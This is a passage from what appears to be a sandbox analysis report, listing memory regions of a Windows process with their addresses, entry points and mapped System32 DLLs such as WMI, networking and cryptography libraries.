"\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 658 start_va = 0x7fef6bf0000 end_va = 0x7fef6c31fff monitored = 0 entry_point = 0x7fef6c20048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 659 start_va = 0x7fef6c40000 end_va = 0x7fef6c59fff monitored = 0 entry_point = 0x7fef6c51ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 660 start_va = 0x7fef6c60000 end_va = 0x7fef6c76fff monitored = 0 entry_point = 0x7fef6c69d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 661 start_va = 0x7fef6c80000 end_va = 0x7fef6c8efff monitored = 0 entry_point = 0x7fef6c86894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 662 start_va = 0x7fef8790000 end_va = 0x7fef879bfff monitored = 0 entry_point = 0x7fef879602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 663 start_va = 0x7fef8b90000 end_va = 0x7fef8b97fff monitored = 0 entry_point = 0x7fef8b91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 664 start_va = 0x7fef8ca0000 end_va = 0x7fef8d10fff monitored = 0 entry_point = 0x7fef8ce51d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 665 start_va = 0x7fef8d20000 end_va = 0x7fef8d31fff monitored = 0 entry_point = 0x7fef8d289d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 666 start_va = 0x7fef8d40000 end_va = 0x7fef8df4fff monitored = 0 entry_point = 0x7fef8dbcf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 667 start_va = 0x7fef8e00000 end_va = 0x7fef8e18fff monitored = 0 entry_point = 0x7fef8e01104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 668 start_va = 0x7fef8e20000 end_va = 0x7fef8e6ffff monitored = 0 entry_point = 0x7fef8e21190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 669 start_va = 0x7fef8e70000 end_va = 0x7fef8e77fff monitored = 0 entry_point = 0x7fef8e71020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 670 start_va = 0x7fef8e80000 end_va = 0x7fef8ed9fff monitored = 0 entry_point = 0x7fef8ebdde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 671 start_va = 0x7fef8ee0000 end_va = 0x7fef8f00fff monitored = 0 entry_point = 0x7fef8ef03b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 672 start_va = 0x7fef8f10000 end_va = 0x7fef8f83fff monitored = 0 entry_point = 0x7fef8f166f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 673 start_va = 0x7fef8f90000 end_va = 0x7fef8ffafff monitored = 0 entry_point = 0x7fef8fd4344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 674 start_va = 0x7fef9000000 end_va = 0x7fef9012fff monitored = 0 entry_point = 0x7fef9001d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 675 start_va = 0x7fef9020000 end_va = 0x7fef9081fff monitored = 0 entry_point = 0x7fef905bd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 676 start_va = 0x7fef9090000 end_va = 0x7fef91bbfff monitored = 0 entry_point = 0x7fef9140ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 677 start_va = 0x7fef91c0000 end_va = 0x7fef91d9fff monitored = 0 entry_point = 0x7fef91d3fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 678 start_va = 0x7fef91e0000 end_va = 0x7fef9263fff monitored = 0 entry_point = 0x7fef9231118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 679 start_va = 0x7fef9270000 end_va = 0x7fef9294fff monitored = 0 entry_point = 0x7fef9288c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 680 start_va = 0x7fef92a0000 end_va = 0x7fef92dcfff monitored = 0 entry_point = 0x7fef92a1070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 681 start_va = 0x7fef92e0000 end_va = 0x7fef92edfff monitored = 0 entry_point = 0x7fef92e5500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 682 start_va = 0x7fef92f0000 end_va = 0x7fef9316fff monitored = 0 entry_point = 0x7fef92f11a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 683 start_va = 0x7fef9320000 end_va = 0x7fef93f2fff monitored = 0 entry_point = 0x7fef9398b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 684 start_va = 0x7fef9440000 end_va = 0x7fef9486fff monitored = 0 entry_point = 0x7fef9441040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 685 start_va = 0x7fef9490000 end_va = 0x7fef94d1fff monitored = 0 entry_point = 0x7fef94917e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 686 start_va = 0x7fef94e0000 end_va = 0x7fef9571fff monitored = 0 entry_point = 0x7fef95551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 687 start_va = 0x7fef9580000 end_va = 0x7fef95f6fff monitored = 0 entry_point = 0x7fef95be7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 688 start_va = 0x7fef9600000 end_va = 0x7fef9639fff monitored = 0 entry_point = 0x7fef961d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 689 start_va = 0x7fef9680000 end_va = 0x7fef969cfff monitored = 0 entry_point = 0x7fef9682f18 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 690 start_va = 0x7fef96f0000 end_va = 0x7fef9704fff monitored = 0 entry_point = 0x7fef96f1020 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 691 start_va = 0x7fef9910000 end_va = 0x7fef9920fff monitored = 0 entry_point = 0x7fef9919e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 692 start_va = 0x7fef9930000 end_va = 0x7fef9993fff monitored = 0 entry_point = 0x7fef9931254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 693 start_va = 0x7fef99a0000 end_va = 0x7fef9a10fff monitored = 0 entry_point = 0x7fef99a1010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 694 start_va = 0x7fef9ab0000 end_va = 0x7fef9ac6fff monitored = 0 entry_point = 0x7fef9ab1060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 695 start_va = 0x7fef9ad0000 end_va = 0x7fef9c7ffff monitored = 0 entry_point = 0x7fef9ad1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 696 start_va = 0x7fef9f40000 end_va = 0x7fef9f48fff monitored = 0 entry_point = 0x7fef9f411a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 697 start_va = 0x7fefa170000 end_va = 0x7fefa1e6fff monitored = 0 entry_point = 0x7fefa17afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 698 start_va = 0x7fefa290000 end_va = 0x7fefa299fff monitored = 0 entry_point = 0x7fefa29260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 699 start_va = 0x7fefa2a0000 end_va = 0x7fefa3b1fff monitored = 0 entry_point = 0x7fefa2bf354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 700 start_va = 0x7fefa3c0000 end_va = 0x7fefa3cefff monitored = 0 entry_point = 0x7fefa3c7e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 701 start_va = 0x7fefa3d0000 end_va = 0x7fefa3d8fff monitored = 0 entry_point = 0x7fefa3d3668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 702 start_va = 0x7fefa3e0000 end_va = 0x7fefa3e8fff monitored = 0 entry_point = 0x7fefa3e1020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 703 start_va = 0x7fefa3f0000 end_va = 0x7fefa445fff monitored = 0 entry_point = 0x7fefa3f1040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 704 start_va = 0x7fefa450000 end_va = 0x7fefa4adfff monitored = 0 entry_point = 0x7fefa459024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 705 start_va = 0x7fefa4b0000 end_va = 0x7fefa4c7fff monitored = 0 entry_point = 0x7fefa4b1bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 706 start_va = 0x7fefa4d0000 end_va = 0x7fefa4e0fff monitored = 0 entry_point = 0x7fefa4d16ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 707 start_va = 0x7fefa520000 end_va = 0x7fefa572fff monitored = 0 entry_point = 0x7fefa522b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 708 start_va = 0x7fefa730000 end_va = 0x7fefa73afff monitored = 0 entry_point = 0x7fefa731198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 709 start_va = 0x7fefa740000 end_va = 0x7fefa766fff monitored = 0 entry_point = 0x7fefa7498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 710 start_va = 0x7fefa770000 end_va = 0x7fefa783fff monitored = 0 entry_point = 0x7fefa773e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 711 start_va = 0x7fefa7a0000 end_va = 0x7fefa806fff monitored = 0 entry_point = 0x7fefa7b6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 712 start_va = 0x7fefa810000 end_va = 0x7fefa81afff monitored = 0 entry_point = 0x7fefa814f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 713 start_va = 0x7fefa820000 end_va = 0x7fefa82bfff monitored = 0 entry_point = 0x7fefa8215d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 714 start_va = 0x7fefa830000 end_va = 0x7fefa83ffff monitored = 0 entry_point = 0x7fefa83835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 715 start_va = 0x7fefa840000 end_va = 0x7fefa858fff monitored = 0 entry_point = 0x7fefa8411a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 716 start_va = 0x7fefa860000 end_va = 0x7fefa896fff monitored = 0 entry_point = 0x7fefa868424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 717 start_va = 0x7fefa8e0000 end_va = 0x7fefa8f4fff monitored = 0 entry_point = 0x7fefa8e60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 718 start_va = 0x7fefa900000 end_va = 0x7fefa9c1fff monitored = 0 entry_point = 0x7fefa90101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 719 start_va = 0x7fefac00000 end_va = 0x7fefac08fff monitored = 0 entry_point = 0x7fefac01010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 720 start_va = 0x7fefacf0000 end_va = 0x7fefad1cfff monitored = 0 entry_point = 0x7fefacf1010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 721 start_va = 0x7fefad20000 end_va = 0x7fefad30fff monitored = 0 entry_point = 0x7fefad214c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 722 start_va = 0x7fefae70000 end_va = 0x7fefae83fff monitored = 0 entry_point = 0x7fefae716b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 723 start_va = 0x7fefae90000 end_va = 0x7fefaea4fff monitored = 0 entry_point = 0x7fefae91050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 724 start_va = 0x7fefaeb0000 end_va = 0x7fefaebbfff monitored = 0 entry_point = 0x7fefaeb18a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 725 start_va = 0x7fefaec0000 end_va = 0x7fefaed5fff monitored = 0 entry_point = 0x7fefaec11a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 726 start_va = 0x7fefaff0000 end_va = 0x7fefb000fff monitored = 0 entry_point = 0x7fefaff1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 727 start_va = 0x7fefb150000 end_va = 0x7fefb184fff monitored = 0 entry_point = 0x7fefb151064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 728 start_va = 0x7fefb5c0000 end_va = 0x7fefb615fff monitored = 0 entry_point = 0x7fefb5cbbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 729 start_va = 0x7fefb620000 end_va = 0x7fefb74bfff monitored = 0 entry_point = 0x7fefb6294bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 730 start_va = 0x7fefb750000 end_va = 0x7fefb76cfff monitored = 0 entry_point = 0x7fefb751ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 731 start_va = 0x7fefb7a0000 end_va = 0x7fefb993fff monitored = 0 entry_point = 0x7fefb92c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 732 start_va = 0x7fefbe30000 end_va = 0x7fefbe3bfff monitored = 0 entry_point = 0x7fefbe31064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 733 start_va = 0x7fefbe40000 end_va = 0x7fefbefafff monitored = 0 entry_point = 0x7fefbe46de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 734 start_va = 0x7fefbf00000 end_va = 0x7fefbf06fff monitored = 0 entry_point = 0x7fefbf014b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 735 start_va = 0x7fefbff0000 end_va = 0x7fefc00afff monitored = 0 entry_point = 0x7fefbff2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 736 start_va = 0x7fefc010000 end_va = 0x7fefc02dfff monitored = 0 entry_point = 0x7fefc0113b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 737 start_va = 0x7fefc030000 end_va = 0x7fefc041fff monitored = 0 entry_point = 0x7fefc031060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 738 start_va = 0x7fefc050000 end_va = 0x7fefc06efff monitored = 0 entry_point = 0x7fefc055c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 739 start_va = 0x7fefc120000 end_va = 0x7fefc158fff monitored = 0 entry_point = 0x7fefc12c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 740 start_va = 0x7fefc160000 end_va = 0x7fefc169fff monitored = 0 entry_point = 0x7fefc163cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 741 start_va = 0x7fefc170000 end_va = 0x7fefc17cfff monitored = 0 entry_point = 0x7fefc171348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 742 start_va = 0x7fefc260000 end_va = 0x7fefc2a6fff monitored = 0 entry_point = 0x7fefc261064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 743 start_va = 0x7fefc350000 end_va = 0x7fefc37ffff monitored = 0 entry_point = 0x7fefc35194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 744 start_va = 0x7fefc380000 end_va = 0x7fefc3dafff monitored = 0 entry_point = 0x7fefc386940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 745 start_va = 0x7fefc4f0000 end_va = 0x7fefc4f6fff monitored = 0 entry_point = 0x7fefc4f142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 746 start_va = 0x7fefc500000 end_va = 0x7fefc554fff monitored = 0 entry_point = 0x7fefc501054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 747 start_va = 0x7fefc560000 end_va = 0x7fefc577fff monitored = 0 entry_point = 0x7fefc563b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 748 start_va = 0x7fefc670000 end_va = 0x7fefc6a1fff monitored = 0 entry_point = 0x7fefc67144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 749 start_va = 0x7fefc6b0000 end_va = 0x7fefc6b7fff monitored = 0 entry_point = 0x7fefc6b2a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 750 start_va = 0x7fefc6c0000 end_va = 0x7fefc6c9fff monitored = 0 entry_point = 0x7fefc6c3b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 751 start_va = 0x7fefc6d0000 end_va = 0x7fefc6f1fff monitored = 0 entry_point = 0x7fefc6d5d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 752 start_va = 0x7fefc750000 end_va = 0x7fefc77efff monitored = 0 entry_point = 0x7fefc751064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 753 start_va = 0x7fefc790000 end_va = 0x7fefc7fcfff monitored = 0 entry_point = 0x7fefc791010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 754 start_va = 0x7fefc800000 end_va = 0x7fefc813fff monitored = 0 entry_point = 0x7fefc804160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 755 start_va = 0x7fefca60000 end_va = 0x7fefca82fff monitored = 0 entry_point = 0x7fefca61198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 756 start_va = 0x7fefcb00000 end_va = 0x7fefcb0afff monitored = 0 entry_point = 0x7fefcb01030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 757 start_va = 0x7fefcb30000 end_va = 0x7fefcb54fff monitored = 0 entry_point = 0x7fefcb39658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 758 start_va = 0x7fefcb60000 end_va = 0x7fefcb6efff monitored = 0 entry_point = 0x7fefcb61010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 759 start_va = 0x7fefcb70000 end_va = 0x7fefcc00fff monitored = 0 entry_point = 0x7fefcb71440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 760 start_va = 0x7fefcc10000 end_va = 0x7fefcc4cfff monitored = 0 entry_point = 0x7fefcc118f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 761 start_va = 0x7fefcc50000 end_va = 0x7fefcc63fff monitored = 0 entry_point = 0x7fefcc510e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 762 start_va = 0x7fefcc70000 end_va = 0x7fefcc7efff monitored = 0 entry_point = 0x7fefcc719b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 763 start_va = 0x7fefcd10000 end_va = 0x7fefcd1efff monitored = 0 entry_point = 0x7fefcd11020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 764 start_va = 0x7fefcd20000 end_va = 0x7fefcd8bfff monitored = 0 entry_point = 0x7fefcd22780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 765 start_va = 0x7fefcd90000 end_va = 0x7fefcefcfff monitored = 0 entry_point = 0x7fefcd910b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 766 start_va = 0x7fefcf00000 end_va = 0x7fefcf35fff monitored = 0 entry_point = 0x7fefcf01474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 767 start_va = 0x7fefcf40000 end_va = 0x7fefcf59fff monitored = 0 entry_point = 0x7fefcf41558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 768 start_va = 0x7fefd000000 end_va = 0x7fefd03afff monitored = 0 entry_point = 0x7fefd001324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 769 start_va = 0x7fefd420000 end_va = 0x7fefd486fff monitored = 0 entry_point = 0x7fefd42b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 770 start_va = 0x7fefd490000 end_va = 